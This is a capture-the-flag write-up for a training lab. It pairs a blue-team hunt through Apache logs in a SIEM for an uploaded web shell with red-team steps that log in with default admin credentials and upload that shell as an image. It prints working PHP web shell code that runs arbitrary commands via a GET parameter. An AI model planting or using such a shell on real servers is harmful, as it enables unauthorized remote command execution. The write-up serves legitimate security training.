Day 3: Even if I wanted to go, their vulnerabilities wouldn't allow it.

Note:

Hey! Before you go through this writeup try the task first by your self and if you get stuck come back and checkout the writeup.

We have been given access to a SIEM and according to the story we are dealing with a Apache web logs and need to track down a web shell.

A web shell is a malicious script uploaded to a web server, providing attackers with remote access and control over the compromised system. Often written in languages like PHP, ASP, or Python, web shells allow attackers to execute commands, manipulate files, or escalate privileges. They are commonly used for persistence in targeted attacks, making detection and removal critical. Monitoring for unusual web server behaviour and implementing strong input validation are key defences against web shell exploitation.

Launch the AttackBox and head over to its IP.

Using the left hand side menu visit the “Discovery” page.

Change the collection to the “frostypines-resorts” data collection.

Set a time filter for between “11:30 and 12:00 on October 3rd 2024”.

Q: BLUE: Where was the web shell uploaded to?

A: The raw Apache logs is stored in a parameter called "message," this includes upload directories and files. We can filter for "shell.php" string to find where the web shell was uploaded. To run the shell, it needs to be accessed, usually with a GET request. Since the request includes the file path, filtering the logs helps pinpoint where "shell.php" was uploaded on the file system

We can use the following KQL to search for the string “shell.php” in the message parameter

message : “shell.php”

Q: BLUE: What IP address accessed the web shell?

A: With the same filter message filter as before lets filter for the “client IP”.

There are two IPs, as one has more events to it than the other. Lets filter for this IP

This is the answer for the question.

Q: RED: What is the contents of the flag.txt?

A: To get the flag we need to replicate the web shell attack to gain access to web server.

To visit the website we need to add the IP into our host file so that when we visit frostypines.thmit will direct the browser to the webpage. Based on your platform the way to do this is different. Here is a guide on how to do this on all Windows, Mac and Linux.

How to Edit Hosts File in Windows, macOS, and Linux

A hosts file is a computer file used to map hostnames to IP addresses. Learn how to edit the hosts file in Windows, macOS, and Linux.

Liquid WebMisael Ramirez

Once your on the website we can log in as an admin using one of the default credentials listed in the story.

We’ll use the “admin@frostypines.thm” username and “admin” password to login as an admin.

Once we are logged in the account drop down we can visit the Admin console.

We need a web shell to execute on this web site.

The challenge author has provided us with a sample web shell.

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['command'])) 
    {
        system($_GET['command'] . ' 2>&1'); 
    }
?>
</pre>
</body>
</html> 

Save this into a file called “shell.php” you can name it whatever you want but make sure that it ends with “.php”.

In the admin console click on “Add new Room” and for the picture upload the web shell.

NOTE: Based on your browser you might have to drag and drop the file onto the “Browse…” buttonn.

Click on “Add Room”.

You will be redirected back to the “Rooms” page, and the newly created room will be shown.

Right click on it’s image and open it in a new tab.

In the new tab the web shell should open.

You can run the following command to get the flag.

cat flag.txt

Q: If you liked today's task, you can learn how to harness the power of advanced ELK queries.

A: No Answer needed!